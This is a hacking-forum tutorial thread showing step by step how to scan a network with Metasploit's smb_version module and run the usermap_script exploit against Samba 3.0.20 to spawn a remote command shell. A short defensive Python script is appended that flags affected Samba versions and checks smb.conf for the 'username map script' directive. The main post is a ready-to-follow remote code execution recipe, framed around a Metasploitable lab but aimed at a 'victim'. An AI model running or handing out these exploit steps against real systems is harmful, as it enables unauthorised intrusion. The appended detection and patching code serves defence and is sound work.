Tutorial Samba Exploit [Spawn a command shell on the Victim] - Sinisterly (https://sinister.ly), Forum: Network Hacking
Samba Exploit [Spawn a command shell on the Victim] - Crypt - 11-17-2013

Hello everyone, this will be my 3rd security tutorial. This particular exploit exploits Samba version 3.0.20 and spawns a remote command shell on the victim.

The tools/programs we will be using today are:
VirtualBox (unless you use BackTrack 5 R3 or Kali Linux as your main operating system) OR VMware
BackTrack 5 R3 (or Kali Linux)
Metasploitable (you can download it here)
Metasploit (included in BackTrack 5 R3 and Kali Linux)

I'm not going to explain to you how to set up BackTrack, Kali Linux, or Metasploitable on VirtualBox because that is not what the tutorial is for. Alright, on with the tutorial.

First things first, start up BackTrack/Kali and Metasploitable. When it brings you to the login for Metasploitable, type in msfadmin as the user and msfadmin as the password. After you've done that, get Metasploitable's internal IP by typing this in the console/command prompt:
Code:
ifconfig

If your network is set up correctly on the virtual machine, it should do something like this. The IP I put the red box over is where your internal IP should come up; mine is 192.168.1.88. Memorize the IP or store it somewhere in case you forget it.

Now that you've done that, head over to BackTrack and start up Metasploit by opening a terminal window and typing
Code:
msfconsole

It will take a minute or so for Metasploit to start up. Once it has started up, it should look something like this.

Alright, now that we're done with the first few steps, let's get to the fun part. In the Metasploit console you'll type
Code:
use auxiliary/scanner/smb/smb_version

This scanner (depending on the options you enter in; we'll get to that in a second) scans every host on your LAN to see if they're running Samba and what version they're running. Now go ahead and type in "show options" without the quotes. You should get a menu telling you what options there are, as well as what's required and what isn't.
It should look like this. Now, you'll type
Code:
set rhosts 192.168.1.0/24

This scans everything on your network from 192.168.1.0 and up to see if they're running Samba and what version they're running. Now we're going to pump the threads up to 75. This tells it that the difficulty is 75, meaning it will search harder and do a better scan than if it were set to 1. Go ahead and type in
Code:
set threads 75

Once you've done that, it's time to start the scanner. Type "run" without the quotes and give it a second to scan the network. It should look something like this when it's done. Try to find Metasploitable's internal IP, and next to it it should say
Quote:
internaliphere:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)

(This is optional) In the Metasploit console type in
Code:
search samba

This will give you every exploit module that contains the word "samba" in it; this is just so you can see the different types and whatnot. But for this tutorial we're using exploit/multi/samba/usermap_script. This gives us the privilege to perform Remote Command Execution. So in the console type
Code:
use exploit/multi/samba/usermap_script

Now type
Code:
show options

and that will give you the options for this particular exploit. As you can see, one of the options is RHOST. You're going to set the RHOST to Metasploitable's internal IP. In the console type in
Code:
set rhost metasploitableinternaliphere

So for me it would be
Code:
set rhost 192.168.1.88

And when you're ready, go ahead and type "exploit" without the quotation marks. If you've done everything correctly, your Metasploit window should look something like this.

BOOM! There you go. You have now spawned a command shell and owned this box. From there, you can type in anything that you'd be able to type in at a Unix machine's command prompt. I hope you all liked this tutorial; please feel free to post comments, questions, or concerns and keep the thread alive.
Peace

RE: Samba Exploit [Spawn a command shell on the Victim] - Lotus Black - 03-31-2014
Something new for me, thanks mate.

RE: Samba Exploit [Spawn a command shell on the Victim] - Zayne - 03-31-2014
You actually won't need BackTrack or Kali, but the packages.

RE: Samba Exploit [Spawn a command shell on the Victim] - G0d - 03-31-2014
This is a fun exploit. Gonna go try it now.
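The script below is an added example for this thread; it is not from any of the posts above and not part of Metasploit. It takes the defender's side of the two things the tutorial depends on: a Samba build in the affected 3.0.x range advertised on port 445, in the output shape the smb_version scanner prints and the thread quotes, and the `username map script` directive in smb.conf, which the usermap_script module needs to be configured on the target. The scan lines and the smb.conf fragment are constructed samples; the affected range (3.0.20 up to, but not including, the final 3.0.25 release) follows the Samba fix history, and the function names are the example's own.

```python
"""Turn smb_version-style scan output into a patch list and audit smb.conf for
the 'username map script' directive. Sample inputs below are constructed."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample of smb_version scanner output, in the shape quoted in the thread.
SAMPLE_SCAN_OUTPUT = """\
[*] 192.168.1.88:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
[*] 192.168.1.90:445 is running Unix Samba 3.6.25 (language: Unknown) (domain:WORKGROUP)
[*] 192.168.1.91:445 is running Windows 7 Professional 7601 Service Pack 1 (language: Unknown) (domain:WORKGROUP)
[*] 192.168.1.92:445 is running Unix Samba 3.0.37 (language: Unknown) (domain:WORKGROUP)
"""

# Constructed smb.conf fragment containing the directive the usermap_script module relies on.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server
   ; legacy mapping hook left in place by a previous admin
   username map script = /etc/samba/scripts/mapusers.sh
   # UserName Map Script = /tmp/commented-out.sh
[homes]
   comment = Home Directories
   browseable = no
"""

# Affected range: 3.0.20 up to, but not including, the final 3.0.25 release.
# Pre-release 3.0.25rcN builds are still affected, so the tuple layout is
# (major, minor, patch, is_final_release) and an rc sorts below the final.
AFFECTED_FROM = (3, 0, 20, 1)
FIXED_IN = (3, 0, 25, 1)

SCAN_LINE_RE = re.compile(
    r"(?P<host>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+) is running (?P<banner>.+)"
)
SAMBA_VER_RE = re.compile(
    r"Samba (?P<maj>\d+)\.(?P<min>\d+)\.(?P<pat>\d+)(?P<pre>(?:rc|pre)\d*)?", re.IGNORECASE
)


def parse_samba_version(banner: str) -> Optional[Tuple[int, int, int, int]]:
    """Return (major, minor, patch, is_final) from a banner such as
    'Unix Samba 3.0.20-Debian', or None when the banner is not a Samba one."""
    m = SAMBA_VER_RE.search(banner)
    if not m:
        return None
    is_final = 0 if m.group("pre") else 1
    return (int(m.group("maj")), int(m.group("min")), int(m.group("pat")), is_final)


def is_affected_version(banner: str) -> bool:
    """True when the advertised build falls inside [AFFECTED_FROM, FIXED_IN)."""
    v = parse_samba_version(banner)
    return v is not None and AFFECTED_FROM <= v < FIXED_IN


def parse_scan_output(text: str) -> Dict[str, str]:
    """Map host -> banner for every result line; lines without a result are ignored."""
    results: Dict[str, str] = {}
    for line in text.splitlines():
        m = SCAN_LINE_RE.search(line)
        if m:
            results[m.group("host")] = m.group("banner").strip()
    return results


def affected_hosts(text: str) -> List[str]:
    """Hosts whose advertised Samba build is in the affected range, in scan order."""
    return [h for h, b in parse_scan_output(text).items() if is_affected_version(b)]


def find_username_map_script(conf_text: str) -> List[Tuple[str, str]]:
    """Return (section, value) for every active 'username map script' directive.
    Samba parameter names ignore case and whitespace, so the key is normalised
    before comparison; lines starting with '#' or ';' are comments."""
    found: List[Tuple[str, str]] = []
    section = ""
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if "=" not in line:
            continue
        key, value = line.split("=", 1)
        if re.sub(r"\s+", "", key).lower() == "usernamemapscript":
            found.append((section, value.strip()))
    return found


if __name__ == "__main__":
    for host, banner in parse_scan_output(SAMPLE_SCAN_OUTPUT).items():
        flag = "PATCH" if is_affected_version(banner) else "ok"
        print(f"{host:<16} {flag:<6} {banner}")
    for section, value in find_username_map_script(SAMPLE_SMB_CONF):
        print(f"smb.conf [{section}]: username map script = {value} (remove unless required)")
```

Feed it your own scanner output and smb.conf: any host marked PATCH should be upgraded past 3.0.25, and the directive should be dropped from smb.conf wherever it is not genuinely needed, since without it the module described in the thread has nothing to work with.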